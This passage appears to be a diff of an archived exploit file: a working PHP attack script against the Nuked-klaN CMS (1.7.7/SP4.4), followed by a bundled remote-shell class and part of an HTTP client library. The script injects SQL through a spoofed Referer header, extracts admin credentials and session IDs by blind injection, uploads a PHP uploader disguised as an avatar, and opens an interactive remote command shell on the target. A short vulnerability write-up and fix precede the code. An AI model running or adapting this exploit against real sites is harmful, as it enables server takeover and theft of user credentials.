- * - * @access public - * @param string code ServerResponse - * @return string $this->server_content - * @example $this->getcontent() - * @example $this->getcontent($this->get('http://localhost/')) - * - */ - function getcontent($code='') - { - if(empty($code)) - $code = $this->recv; - - $code = explode("\r\n\r\n",$code); - $this->server_content = ''; - - for($i=1;$iserver_content .= $code[$i]; - - return $this->server_content; - } - - - /** - * This function returns the headers - * of the server response, without - * the content. - * - * @access public - * @param string code ServerResponse - * @return string $this->server_header - * @example $this->getcontent() - * @example $this->getcontent($this->post('http://localhost/','1=2')) - * - */ - function getheader($code='') - { - if(empty($code)) - $code = $this->recv; - - $code = explode("\r\n\r\n",$code); - $this->server_header = $code[0]; - - return $this->server_header; - } - - - /** - * This function is called by the - * cookiejar() function. It adds the - * value of the "Set-Cookie" header - * in the "Cookie" header for the - * next request. You don't have to - * call it. - * - * @access private - * @param string code ServerResponse - * - */ - function getcookie() - { - foreach(explode("\r\n",$this->getheader()) as $header) - { - if(preg_match('/set-cookie/i',$header)) - { - $fequal = strpos($header,'='); - $fvirgu = strpos($header,';'); - - // 12=strlen('set-cookie: ') - $cname = substr($header,12,$fequal-12); - $cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1)); - - $this->cookie[trim($cname)] = trim($cvalu); - } - } - } - - - /** - * This function is called by the - * get()/post() functions. You - * don't have to call it. 
- * - * @access private - * @param string urltarg Url - * @example $this->target('http://localhost/') - * - */ - function target($urltarg) - { - if(!ereg('^http://',$urltarg)) - $urltarg = 'http://'.$urltarg; - - $urlarr = parse_url($urltarg); - $this->url = 'http://'.$urlarr['host'].$urlarr['path']; - - if(isset($urlarr['query'])) - $this->url .= '?'.$urlarr['query']; - - $this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80; - $this->host = $urlarr['host']; - - if($this->port != '80') - $this->host .= ':'.$this->port; - - if(!isset($urlarr['path']) or empty($urlarr['path'])) - die("Error: No path precised"); - - $this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1); - - if($this->port > 65535) - die("Error: Invalid port number"); - } - - - /** - * If you call this function, - * the script will extract all - * 'Set-Cookie' headers values - * and it will automatically add - * them into the 'Cookie' header - * for all next requests. - * - * @access public - * @param integer code 1(enabled) 0(disabled) - * @example $this->cookiejar(0) - * @example $this->cookiejar(1) - * - */ - function cookiejar($code) - { - if($code=='0') - $this->cookiejar=FALSE; - - elseif($code=='1') - $this->cookiejar=TRUE; - } - - - /** - * If you call this function, - * the script will follow all - * redirections sent by the server. - * - * @access public - * @param integer code 1(enabled) 0(disabled) - * @example $this->allowredirection(0) - * @example $this->allowredirection(1) - * - */ - function allowredirection($code) - { - if($code=='0') - $this->allowredirection=FALSE; - - elseif($code=='1') - $this->allowredirection=TRUE; - } - - - /** - * This function is called if - * allowredirection() is enabled. - * You don't have to call it. 
- * - * @access private - * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection) - * @return string $this->get($this->last_redirection) - * @return string $this->recv; - * - */ - function getredirection() - { - if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr)) - { - $this->last_redirection = trim($codearr[2]); - - if(!ereg('://',$this->last_redirection)) - return $this->get('http://'.$this->host.$this->path.$this->last_redirection); - - else - return $this->get($this->last_redirection); - } - else - return $this->recv; - } - - - /** - * This function allows you - * to reset some parameters. - * - * @access public - * @param string func Param - * @example $this->reset('header') - * @example $this->reset('cookie') - * @example $this->reset() - * - */ - function reset($func='') - { - switch($func) - { - case 'header': - $this->header = array(); - break; - - case 'cookie': - $this->cookie = array(); - break; - - default: - $this->cookiejar = ''; - $this->header = array(); - $this->cookie = array(); - $this->allowredirection = ''; - break; - } - } -} - -?> - -# milw0rm.com [2008-10-14] + +# URL: http://real.o-n.fr/ +# Date: 14/10/2008 +# +# Special thanks to Louis for remembering me I had to finish it =) +# +# VULNERABILITY DETAILS +# --------------------- +# +# Nuked-klaN suffers from a vulnerability due to HTTP_REFERER, which is not +# correctly filtered before being inserted in nuked_stats_visitor table. +# +# If HTTP headers are not addslashes()'d by PHP, it could lead to a INSERT +# SQL injection. +# +# In function view_referer() (visits.php), referers are extracted from the +# database to perform an other SQL query, without being secured in between. +# This leads to a blind SQL injection. +# +# Theses injections are only possible if Nuked-klaN (NK) considers us as a +# new user, because else it won't touch the nuked_stats_visitor table. 
+# For this, we can use X-Forwarded-For HTTP header to specify NK a new IP, +# to be considered as a new user, and therefore access the database. +# NK automaticaly tries to resolve our host (using gethostbyaddr()), and it +# could be very long if the IP is not corresponding to a real one, because +# the default timeout is ~3 seconds, and that's very unconvenient for blind +# SQL injection. +# In order to solve this, we can try to generate IPs that might be valid, +# using, for example, a known BASE (the first two numbers), and randomizing +# the two other numbers. +# +# Stats can be disabled, or not accessible for users or visitors. +# In the last case we can't get query results, so the unique way to inject +# is BENCHMARK method, but this implies that the headers are not addslashed +# by PHP, but this method is not implemented in this exploit. +# +# If we got an admin session or login, we can spawn a remote shell/uploader +# using the NK "MySQL administration", but PHP safe_mode must be disabled. +# +# This exploit uses all these vulnerabilities to spawn a shell/uploader or +# to simply obtain admin credentials. +# +# EXPLOIT MAP +# ----------- +# +# (ERRORS ARE THIS WAY ->) +# +# +---------------------------+ +# | Check stats accessibility |->exit() +# +---------------------------+ +# | +# | +---------------------------------+ +-----------------------------------------------+ +# +->| Spoof referer to corrupt INSERT |->| Spoof referer to corrupt view_referer() query |->exit() +# | query and look for results | | (blind sql injection) | +# +---------------------------------+ +-----------------------------------------------+ +# | | +# | +--------------------------+ | +---------------------------------------------+ +# +->| Did we find an admin SID |<-----+ | We only have a login and a hashed password, | +# | or not ? 
|------->| we have to crack it and use -admin | +# +--------------------------+ +---------------------------------------------+ +# | +# | +-------------------------------------------------+ +# +->| Login as admin and spawn an uploader or a shell | +# | using "MySQL administration" | +# +-------------------------------------------------+ +# +# SOLUTION +# -------- +# The best way to secure your Nuked-klaN is disabling stats using the admin +# panel. +# If you wan't to keep stats activated, you have to addslashes HTTP_REFERER +# in nuked.php and in visits.php. +# +# +# THIS IS FOR EDUCATION PURPOSES ONLY, as usual. +# + +error_reporting(E_ALL ^ E_NOTICE); + +define('MSG_INFO', 1); +define('MSG_OKAY', 2); +define('MSG_ERROR', 3); +define('MSG_QUESTION', 4); + +define('AGENT', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16'); +define('IPBASE', '82.237.'); + +define('UPCODE', '\')) exit(\'--NOTDONE--\');fclose($h);exit(\'--DONE--\');}else{include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>'); +define('SHCODE', ''); + +$nk = new nk(); + +class nk +{ + var $proxy; + + var $user; + var $admin; + var $suser; + var $sadmin; + var $mode; + var $url; + var $year; + + var $ips = array(); + var $queries; + var $www; + + function nk() + { + $this->header(); + $this->usage(); + + $this->setParameters(); + $this->controlParameters(); + + $this->main(); + } + + function close() + { + $this->msg(); + exit(0); + } + + # Main function, what and when. 
+ function main() + { + # Admin login not specified + if(!$this->sadmin) + { + $this->setQueries(0); + $this->checkStatsAccessibility(); + $this->sendInsertQuery(); + + # Got the credentials =) + if($this->getCredentials()) + { + $this->dumpCredentials(); + } + elseif($this->blindQueries()) + { + if($this->mode != 2 && !$this->admin['sid']) + { + $this->msg('There is no active admin session, try with "-mode 2"', MSG_ERROR); + exit(); + } + + $this->file = str_replace('$_SERVER[\'HTTP_SHELL\']', 'stripslashes($_SERVER[\'HTTP_SHELL\'])', $this->file); + } + # No attack worked + else + { + $this->msg('Exploit failed, stats might be disabled.', MSG_ERROR); + exit(); + } + } + + $this->makeadmin(); + $this->conclude(); + } + + # Define queries in function of the current mode + function setQueries($mode) + { + $this->queries = array(); + + if(!$mode) + { + # User queries + $this->queries['name'] = 'SELECT pseudo FROM users WHERE niveau=9 ORDER BY DATE ASC LIMIT 1'; + $this->queries['password'] = 'SELECT pass FROM users WHERE niveau=9 ORDER BY DATE ASC LIMIT 1'; + + # Session queries + if($this->mode != 2) + { + $this->queries['uid'] = 'SELECT id FROM users WHERE niveau=9 ORDER BY DATE ASC LIMIT 1'; + $this->queries['sid'] = 'SELECT id FROM sessions WHERE user_id=(SELECT id FROM users WHERE niveau=9 ORDER BY DATE ASC LIMIT 1) ORDER BY DATE DESC LIMIT 1'; + } + } + else + { + list($day, $month, $year) = explode(':', date('d:m:Y')); + $this->queries[] = 'ALTER TABLE block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;'; + $this->queries[] = 'UPDATE block SET type=0x2f2e2e2f2e2e2f2e2e2f00 WHERE type=0x6c6f67696e OR type LIKE 0x252f2e2e25 AND active!=0 LIMIT 1;'; + $this->queries[] = 'DELETE FROM stats_visitor WHERE (day=' . $day . ' AND month=' . $month . ' AND year=' . $year . ') OR year=' . $this->year . 
' OR year=0;'; + } + + # Set the SQL prefix + foreach($this->queries as $k => $v) + $this->queries[$k] = str_replace('', $this->sprefix, $v); + } + + # Informs of the stats accessibility + function checkStatsAccessibility() + { + $this->msg('Checking statistics accessibility ...', MSG_INFO, false); + + $accessibility = $this->areStatsReachable(); + + if($accessibility == 1) + { + $this->msg('Statistics are reachable, but require authentification', MSG_OKAY); + + if(!$this->suser) + { + $this->msg('Please create an user and specify it using -user parameter', MSG_ERROR); + exit(); + } + else + { + $this->makeuser(); + } + } + elseif($accessibility == 0) + { + $this->msg('Statistics are reachable as a visitor', MSG_OKAY); + } + else + { + $this->msg('Statistics are NOT reachable or activated', MSG_ERROR); + exit(); + } + } + + # Determine if stats are accessible, and under which conditions + function areStatsReachable() + { + $this->wwwinit(0); + $this->www->addheader('Referer', 'http://test.com/'); + $this->www->get($this->url . 'index.php?file=Stats&nuked_nude=visits&op=view_referer'); + + if(preg_match('#[^<]+#i', $this->www->getcontent())) + return -1; + if(preg_match('#[^<]+#i', $this->www->getcontent())) + return 1; + + if(!preg_match('#http://test\.com/#i', $this->www->getcontent())) + return -1; + + return 0; + } + + # Send the spoofed referer in order to insert interresting + # informations in the nuked_stats_visitors table + function sendInsertQuery() + { + $time = time()+60; + + $this->msg('Sending INSERT query ...', MSG_INFO, false); + + # End the first row + $sql = "http://google.com/', '', '', '', '', '0'), "; + + # For each query, a new row + foreach($this->queries as $key => $query) + { + $sql .= "('', '', '0.0.0.0', 'attack', 'Mozilla', 'Windows', CONCAT(''), '1', '1', '" .$this->year . 
"', '1', '$time'), "; + } + + # End this with the beginning of a row, to have a valid SQL query + $sql .= "('', '', '', '', '', '', '"; + + # Let's send it + $this->wwwinit(0); + $this->www->addheader('Referer', $sql); + $this->www->get($this->url); + + $this->msg('Sent INSERT query ', MSG_OKAY); + } + + # Get insert query result in stats page, credentials + function getCredentials() + { + $this->admin = array(); + + $this->msg('Retrieving credentials ...', MSG_INFO, false); + + $this->wwwinit(1); + $this->www->get($this->url . 'index.php?file=Stats&nuked_nude=visits&op=view_referer&oyear=' . $this->year); + + if(!preg_match_all('##Ui', $this->www->getcontent(), $data)) + { + $this->msg('Unable to reach credentials', MSG_ERROR); + return false; + } + + for($i=0;$iadmin[$data[1][$i]] = $data[2][$i]; + } + + $this->msg('Got the credentials =) ', MSG_OKAY); + + return true; + } + + # Dump $this->user content + function dumpCredentials() + { + $display = array + ( + 'User : ' => 'name', + 'Password : ' => 'password', + 'UserID : ' => 'uid', + 'SessionID : ' => 'sid', + ); + + foreach($display as $key => $value) + if($this->admin[$value]) + $this->msg($key . $this->admin[$value], MSG_OKAY); + } + + # Here we are on the second attack: we have to blind, but only + # critical information because it's pretty long + function blindQueries() + { + $this->msg('Switching to blind mode, be (very) patient ...', MSG_INFO); + + if($this->mode != 2) + { + unset($this->queries['name']); + unset($this->queries['password']); + } + + foreach($this->queries as $key => $query) + { + $length = $key == 'password' ? 32 : 20; + + if($key == 'sid') + { + $query = str_replace + ( + '(' . $this->queries['uid'] . ')', + "'" . $this->admin['uid'] . 
"'", + $query + ); + } + + switch($key) + { + case 'name': $display = 'User : '; break; + case 'password': $display = 'Password : '; break; + case 'sid': $display = 'SessionID : '; break; + case 'uid': $display = 'UserID : '; break; + } + + $this->msg($display, MSG_QUESTION, false); + if(!($this->admin[$key] = $this->blind($query, $length))) return true; + $this->msg($display . $this->admin[$key], MSG_OKAY); + } + + return true; + } + + # SQL Blind function + # Referer SQL field only supports 200 characters, + # so we use a special sql injection to be sure it + # will work fine and fast enought. + # + # 1. Charset + # 2. Dichotomy + # + function blind($query, $nbchars) + { + $result = ''; + + for($p=1;$p<=$nbchars;$p++) + { + $letter = ''; + $sql = "MID(($query),$p,1)"; + + if($this->blind_is($sql)) + { + if($this->blind_isChar($sql)) + { + if($this->blind_isMaj($sql)) + $charset = array(ord('A'), ord('Z')); + else + $charset = array(ord('a'), ord('z')); + } + else + $charset = array(ord('0'), ord('9')); + } + else + break; + + $add = $charset[0]; + + for($pos=$charset[1]-$charset[0];$pos>2;$pos=intval($pos/2+0.5)) + { + $s = 'ORD(' . $sql . ') BETWEEN ' . $add . ' AND ' . ($add+$pos); + if(!$this->blind_test($s)) $add += $pos; + } + + $letter = ''; + + for($i=$add;$i<=$add+$pos+1;$i++) + { + $s = 'ORD(' . $sql . ')=' . $i; + if($this->blind_test($s)) + { + $letter = chr($i); + break; + } + } + + $result .= $letter; + print $letter; + } + + return $result; + } + + function blind_is($sql) + { + return $this->blind_test("ORD($sql)!=0"); + } + + function blind_isChar($query) + { + return $this->blind_test("UPPER($query) BETWEEN 'A' AND 'Z'"); + } + + function blind_isMaj($query) + { + return $this->blind_test("ORD($query) BETWEEN 65 AND 90"); + } + + # Return true or false depending on the page result, before + # setting up PHPsploit and the referer + function blind_test($sql) + { + $site = $this->generateIP(); + $when = '&oday=' . date('d') . '&omonth=' . date('m') . 
'&oyear=' . date('Y'); + + $this->wwwinit(0); + $this->www->addheader('Referer', $this->year . $site . "' OR 1=1 AND $sql AND 'A'='A"); + + # If we have to be user to reach stats + if(sizeof($this->user)) + { + $this->www->get($this->url . 'index.php'); + $this->wwwinit(1); + } + + $this->www->get($this->url . 'index.php?file=Stats&nuked_nude=visits&op=view_referer' . $when); + + if(preg_match('#' . $this->year . $site . '[^<]+\s+([0-9]*)#i', $this->www->getcontent(), $data)) + { + if($data[1] > 0) + return true; + } + else + { + $this->msg('Error while blinding.', MSG_ERROR); + exit(); + } + } + + # Set up the admin + function makeadmin() + { + # The current user is now the admin + $this->user = $this->admin; + + # Determine if we have a session or just a name + if($this->mode == 2) + { + exit(); + } + elseif($this->sadmin) + { + $this->suser = $this->sadmin; + $this->makeuser(); + } + elseif($this->user['sid'] && $this->user['uid']) + { + $this->msg('Got a session, no login required', MSG_OKAY); + } + elseif($this->user['name'] && $this->user['password']) + { + $this->msg('Please crack the admin hash, and use -admin parameter', MSG_ERROR); + exit(); + } + else + { + $this->msg('How did you get there ?', MSG_ERROR); + exit(); + } + + $this->user['aid'] = $this->user['uid']; + $this->user['ip'] = '127.0.0.1'; + + $this->msg('Administrator status OK =)', MSG_OKAY); + } + + # Conclude the attack: spawn a shell or an uploader + function conclude() + { + # Initialise PHPsploit for the last time + $this->wwwinit(1); + $this->www->addheader('Referer', $this->url); + + # Actualize the queries + $this->setQueries(1); + + $this->uploadavatar(); + $this->sendqueries(); + $this->loadshell(); + } + + function uploadavatar() + { + $this->msg('Uploading avatar ...', MSG_INFO, false); + + $fmdt = array + ( + 'frmdt_url' => $this->url . 
'index.php?file=User&op=update_pref', + 'fichiernom' => array + ( + 'frmdt_filename' => 'one.jpg', + 'frmdt_content' => $this->file, + ) + ); + + $this->www->formdata($fmdt); + $this->www->get($this->url . 'index.php?file=User&op=edit_pref'); + + if(!preg_match('#value="([^"]+\.jpg)"#U', $this->www->getcontent(), $match)) + { + $this->msg('Error while uploading avatar', MSG_ERROR); + exit(); + } + + $this->msg('Avatar successfully uploaded (' . basename($match[1]) . ')', MSG_OKAY); + + $match = unpack('H*', $match[1]); + + $this->queries[1] = str_replace('', $match[1], $this->queries[1]); + } + + function sendqueries() + { + $this->msg('Sending SQL queries ', MSG_INFO, false); + + foreach($this->queries as $query) + { + $this->www->post($this->url . 'index.php?file=Admin&page=mysql&op=upgrade_db', 'upgrade=' . $query); + $this->msg('.', 0, false); + } + + $this->msg('SQL queries sent ', MSG_OKAY); + } + + function loadshell() + { + if($this->mode == 0) + { + $this->www->addheader('Shell', '1'); + $this->www->get($this->url); + + if(strpos('--DONE--', $this->www->getcontent())) + $this->msg('File created. URL: ' . $this->url . 'w00t.php', MSG_OKAY); + else + { + # possible causes: safe_mode, open_basedir, file restrictions ... + $this->msg('File was not created', MSG_ERROR); + } + } + else + { + $this->msg('Shell spawned', MSG_OKAY); + $this->msg(); + $sql = array('conf.inc.php', '$global[\'db_host\']', '$global[\'db_user\']', '$global[\'db_password\']', '$global[\'db_name\']'); + new phpreter($this->url . 'index.php', '123456789(.*)123456789', 'cmd', $sql, false); + } + } + + # Login as a specified user, and obtain a $uid and a $sid + function createSession($user, $passwd, &$uid, &$sid) + { + $this->wwwinit(0); + $this->www->addheader('Referer', $this->url . 'index.php'); + $this->www->post($this->url . 
'index.php?file=User&nuked_nude=index&op=login', "pseudo=$user&pass=$passwd&remember_me=ok"); + + preg_match('#nuked_sess_id=([a-z0-9]+)#i', $this->www->getheader(), $sid); + preg_match('#uid=([a-z0-9]+)#i', $this->www->getcontent(), $uid); + + $sid = $sid[1]; + $uid = $uid[1]; + + if($uid && $sid) + return true; + + return false; + } + + # Login user and set his informations + function makeuser() + { + list($user, $passwd) = explode(':', $this->suser); + + $this->user = array(); + + $this->msg('Logging in as ' . $user, MSG_INFO, false); + + if($this->createSession($user, $passwd, $uid, $sid)) + { + $this->user['name'] = $user; + $this->user['password'] = $passwd; + $this->user['uid'] = $uid; + $this->user['sid'] = $sid; + $this->user['ip'] = $this->generateIP(); + + $this->msg('Loggued in as ' . $user . ' (uid=' . $uid . ')', MSG_OKAY); + } + else + { + $this->msg('Unable to log in as ' . $user, MSG_ERROR); + exit(); + } + } + + # Initialize PHPsploit (with a new identity) + function wwwinit($mode) + { + $this->www->reset(); + $this->www->agent(AGENT); + + if($mode && sizeof($this->user)) + $this->wwwuser(); + else + $this->www->addheader('X-Forwarded-For', $this->generateIP()); + } + + # Set user cookies and headers + function wwwuser() + { + $cookies = array(); + + if($this->user['uid']) $cookies['user_id'] = $this->user['uid']; + if($this->user['sid']) $cookies['sess_id'] = $this->user['sid']; + if($this->user['aid']) $cookies['admin_session'] = $this->user['aid']; + + foreach($cookies as $k => $v) + $this->www->addcookie($this->cprefix . $k, $v); + + // yes it's not a cookie + $this->www->addheader('X-Forwarded-For', $this->user['ip']); + } + + # Make an IP which can be gethostbyaddr()'ed, for speed + # reasons + function generateIP() + { + do + { + $ip = IPBASE . rand(1, 20) . '.' . rand(1, 250); + } + while(in_array($ip, $this->ips)); + + $this->ips[] = $ip; + + return $ip; + } + + function msg($msg = '', $type = 0, $n = true) + { + $display = $n ? 
"\r" : ''; + + switch($type) + { + case MSG_INFO: $display .= '[*] '; break; + case MSG_OKAY: $display .= '[+] '; break; + case MSG_ERROR: $display .= '[-] '; break; + case MSG_QUESTION: $display .= '[?] '; break; + } + + $display .= $msg; + + $display .= $n ? "\n" : ''; + + print $display; + } + + function header() + { + $this->msg(); + $this->msg(' Nuked-klaN 1.7.7 and SP4.4 Multiple Vulnerabilities Exploit'); + $this->msg(' by Charles FOL '); + $this->msg(); + } + + function usage() + { + global $argc; + + if($argc<3) + { + $this->msg(' usage: ./nk_exploit.php -url [options]'); + $this->msg(); + $this->msg(' Options: -mode 0: Remote Upload (default)'); + $this->msg(' 1: Remote Code Execution'); + $this->msg(' 2: Admin Hash Extraction'); + $this->msg(' -admin If you have an admin account.'); + $this->msg(' -user If stats page need registration.'); + $this->msg(' -proxy If you want to use a proxy.'); + $this->msg(' -cprefix Cookie prefix (default: nuked_).'); + $this->msg(' -sprefix SQL prefix (default: nuked_).'); + $this->msg(' -file If you wanna upload a specific file'); + $this->msg(' else it will upload a simple uploader.'); + $this->msg(); + $this->msg(' eg: ./nk_exploit.php -url http://localhost/nk/ -admin real:passw0rd'); + $this->msg(' eg: ./nk_exploit.php -url http://localhost/nk/ -file cshell.php -proxy localhost:8118'); + + $this->close(); + } + } + + function setParameters() + { + $this->www = new phpsploit(); + $this->year = rand(1000, 1500); + $this->url = $this->getParameter('url', true); + $this->mode = $this->getParameter('mode', false, 0); + $this->suser = $this->getParameter('user', false); + $this->sadmin = $this->getParameter('admin', false); + $this->proxy = $this->getParameter('proxy', false); + $this->cprefix = $this->getParameter('cprefix', false, 'nuked_'); + $this->sprefix = $this->getParameter('sprefix', false, 'nuked_'); + $this->file = $this->getParameter('file', false); + } + + function controlParameters() + { + if($this->mode == 0) 
+ { + if($this->file) + $this->file = file_get_contents($this->file); + else + $this->file = 'Error ".$_FILES[\'file\'][\'error\'' + . ']."
    ");else echo "
    File uploaded
    "; } ?>
    '; + + $this->file = str_replace('', str_replace("'", "\'", $this->file), UPCODE); + } + else + $this->file = SHCODE; + + if($this->proxy) + $this->www->proxy($this->proxy); + } + + function getParameter($parameter, $required = false, $default = '') + { + global $argv, $argc; + + for($i=0;$i<$argc;$i++) + { + if($argv[$i] == '-' . $parameter) + return $argv[$i+1]; + } + + if($required) + { + $this->msg('-' . $parameter . ' parameter is required.', MSG_ERROR); + $this->close(); + } + + return $default; + } +} + +# PHPreter (a bit modified). +# Find original version on http://real.o-n.fr/ + +/* + * Copyright (c) Charles FOL + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version 2 + * of the License, or (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. + * + * TITLE: PHPreter + * AUTHOR: Charles FOL + * VERSION: 1.0 + * LICENSE: GNU General Public License + * + * This is a really simple class with permits to exec SQL, PHP or CMD + * on a remote host using the HTTP "Shell" header. 
+ * + * + * Sample code: + * [host][sql]# mode=cmd + * [host][cmd]# id + * uid=2176(u47170584) gid=600(ftpusers) + * + * [host][cmd]# mode=php + * [host][php]# echo phpversion(); + * 4.4.8 + * [host][php]# mode=sql + * [host][sql]# SELECT version(), user() + * -------------------------------------------------- + * version() | 5.0.51a-log + * user() | dbo225004932@74.208.16.148 + * -------------------------------------------------- + * + * [host][sql]# + * + */ + +class phpreter +{ + var $url; + var $host; + var $port; + var $page; + + var $mode; + + var $ssql; + + var $prompt; + var $phost; + + var $regex; + var $data; + + /** + * __construct() + * + * @param url The url of the remote shell. + * @param regexp The regex to catch cmd result. + * @param mode Mode: php, sql or cmd. + * @param sql An array with the file to include, + * and sql vars + * @param clear Determines if clear() is called + * on startup + */ + function phpreter($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true) + { + $this->url = $url; + + $this->regex = '#'.$regexp.'#is'; + + # + # Set data + # + + $infos = parse_url($this->url); + $this->host = $infos['host']; + $this->port = isset($infos['port']) ? $infos['port'] : 80; + $this->page = $infos['path']; + + # www.(site).com + $host_tmp = explode('.',$this->host); + $this->phost = $host_tmp[ count($host_tmp)-2 ]; + + # + # Set up MySQL connection string + # + if(!sizeof($sql)) + $this->ssql = ''; + elseif(sizeof($sql) == 5) + { + $this->ssql = "include('$sql[0]');" + . "mysql_connect($sql[1], $sql[2], $sql[3]);" + . "mysql_select_db($sql[4]);"; + } + else + { + $this->ssql = "" + . "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');" + . 
"mysql_select_db('$sql[3]');"; + } + + $this->setmode($mode); + + # + # Main Loop + # + + if($clear) $this->clear(); + print $this->prompt; + + while( !preg_match('#^(quit|exit|close)$#i', ($cmd = trim(fgets(STDIN)))) ) + { + # change mode + if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array)) + $this->setmode($array[3]); + + # clear data + elseif(preg_match('#^clear$#i',$cmd)) + $this->clear(); + + # else + else print $this->exec($cmd); + + print $this->prompt; + } + } + + /** + * clear() + * Just clears ouput, printing '\n'x50 + */ + function clear() + { + print str_repeat("\n", 50); + return 0; + } + + /** + * setmode() + * Set mode (PHP, CMD, SQL) + * You don't have to call it. + * use mode=[php|cmd|sql] instead, + * in the prompt. + */ + function setmode($newmode) + { + $this->mode = strtolower($newmode); + $this->prompt = '['.$this->phost.']['.$this->mode.']# '; + + switch($this->mode) + { + case 'cmd': + $this->data = 'system(\'\');'; + break; + case 'php': + $this->data = ''; + break; + case 'sql': + $this->data = $this->ssql + . '$q = mysql_query(\'\') or print(str_repeat("-",50)."\n".mysql_error()."\n");' + . 'print str_repeat("-",50)."\n";' + . 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))' + . '{' + . 'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $v\n";' + . 'print str_repeat("-",50)."\n";' + . '}'; + break; + } + return $this->mode; + } + + /** + * exec() + * Execute any query and catch the result. + * You don't have to call it. + */ + function exec($cmd) + { + if(!strlen($this->data)) $shell = $cmd; + else $shell = str_replace('', addslashes($cmd), $this->data); + + $fp = fsockopen($this->host, $this->port, $errno, $errstr, 30); + + $req = "GET " . $this->page . " HTTP/1.1\r\n"; + $req .= "Host: " . $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) . 
"\r\n"; + $req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n"; + $req .= "X-Forwarded-For: 127.0.0.1\r\n"; // here is the mod. + $req .= "Shell: $shell\r\n"; + $req .= "Connection: close\r\n\r\n"; + + fputs($fp, $req); + + $content = ''; + while(!feof($fp)) $content .= fgets($fp, 128); + + fclose($fp); + + # Remove headers + $data = explode("\r\n\r\n", $content); + $headers = array_shift($data); + $content = implode("\r\n\r\n", $data); + + if(preg_match("#Transfer-Encoding:.*chunked#i", $headers)) + $content = $this->unchunk($content); + + preg_match($this->regex, $content, $data); + + if($data[1][ strlen($data)-1 ] != "\n") $data[1] .= "\n"; + + return $data[1]; + } + + /** + * unchunk() + * This function aims to remove chunked content's sizes which + * are put by the apache server when it uses chunked + * transfert-encoding. + */ + function unchunk($data) + { + $dsize = 1; + $offset = 0; + + while($dsize>0) + { + $hsize_size = strpos($data, "\r\n", $offset) - $offset; + + $dsize = hexdec(substr($data, $offset, $hsize_size)); + + # Remove $hsize\r\n from $data + $data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) ); + + $offset += $dsize; + + # Remove the \r\n before the next $hsize + $data = substr($data, 0, $offset) . substr($data, ($offset+2) ); + } + + return $data; + } +} + +# PHPsploitClass + +/* + * + * Copyright (C) darkfig + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version 2 + * of the License, or (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. 
+ * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. + * + * TITLE: PhpSploit Class + * REQUIREMENTS: PHP 4 / PHP 5 + * VERSION: 2.0 + * LICENSE: GNU General Public License + * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt + * FILENAME: phpsploitclass.php + * + * CONTACT: gmdarkfig@gmail.com (french / english) + * GREETZ: Sparah, Ddx39 + * + * DESCRIPTION: + * The phpsploit is a class implementing a web user agent. + * You can add cookies, headers, use a proxy server with (or without) a + * basic authentification. It supports the GET and the POST method. It can + * also be used like a browser with the cookiejar() function (which allow + * a server to add several cookies for the next requests) and the + * allowredirection() function (which allow the script to follow all + * redirections sent by the server). It can return the content (or the + * headers) of the request. Others useful functions can be used for debugging. + * A manual is actually in development but to know how to use it, you can + * read the comments. 
+ * + * CHANGELOG: + * + * [2007-06-10] (2.0) + * * Code: Code optimization + * * New: Compatible with PHP 4 by default + * + * [2007-01-24] (1.2) + * * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) + * * New: multipart/form-data enctype is now supported + * + * [2006-12-31] (1.1) + * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) + * * New: You can now call the getheader() / getcontent() function without parameters + * + * [2006-12-30] (1.0) + * * First version + * + */ + +class phpsploit +{ + var $proxyhost; + var $proxyport; + var $host; + var $path; + var $port; + var $method; + var $url; + var $packet; + var $proxyuser; + var $proxypass; + var $header; + var $cookie; + var $data; + var $boundary; + var $allowredirection; + var $last_redirection; + var $cookiejar; + var $recv; + var $cookie_str; + var $header_str; + var $server_content; + var $server_header; + + + /** + * This function is called by the + * get()/post()/formdata() functions. + * You don't have to call it, this is + * the main function. + * + * @access private + * @return string $this->recv ServerResponse + * + */ + function sock() + { + if(!empty($this->proxyhost) && !empty($this->proxyport)) + $socket = @fsockopen($this->proxyhost,$this->proxyport); + else + $socket = @fsockopen($this->host,$this->port); + + if(!$socket) + die("Error: Host seems down"); + + if($this->method=='get') + $this->packet = 'GET '.$this->url." HTTP/1.1\r\n"; + + elseif($this->method=='post' or $this->method=='formdata') + $this->packet = 'POST '.$this->url." 
